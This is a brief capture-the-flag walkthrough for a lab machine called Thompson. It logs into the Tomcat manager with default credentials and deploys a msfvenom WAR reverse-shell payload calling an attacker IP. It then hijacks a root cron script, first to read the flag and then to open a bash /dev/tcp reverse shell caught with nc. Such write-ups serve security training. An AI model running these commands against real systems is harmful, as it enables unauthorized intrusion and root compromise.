Thompson - Writeup

1 minute read

Sept 30, 2020

Thompson Writeup

Nmap Scan :

kali@kali:~$ nmap -sC -sV 10.10.218.79
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA)
|   256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA)
|_  256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open  http    Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Gobuster Scan :

/docs (Status: 302)
/examples (Status: 302)
/favicon.ico (Status: 200)
/host-manager (Status: 302)
/manager (Status: 302)

Checking the /manager with the default creds of user : tomcat & passwd : s3cret we get access.

Since we are logged in, we can create a .WAR payload using msfvenom and get a reverse connection.

kali@kali:~$ msfvenom -p java/shell_reverse_tcp lhost=10.8.14.157 lport=9991 -f war -o pwn.war
Payload size: 13402 bytes
Final size of war file: 13402 bytes
Saved as: pwn.war

1st Privilege Escalation :

I noticed that the id.sh is executed by bash every minute, so let’s abuse it :

*  *    * * *   root    cd /home/jack && bash id.sh
tomcat@ubuntu:/home/jack$ echo "cat /root/root.txt > test.txt" > id.sh
tomcat@ubuntu:/home/jack$ cat test.txt
tomcat@ubuntu:/home/jack$ d89d*************************a3a

2nd Privilege Escalation :

tomcat@ubuntu:/home/jack$ echo "bash -i >& /dev/tcp/10.8.14.157/8080 0>&1" > id.sh
kali@kali:~$ nc -lnvp 8080
root@ubuntu:/home/jack# id
uid=0(root) gid=0(root) groups=0(root)



Best Regards

bvr0n.



back to main()


Updated: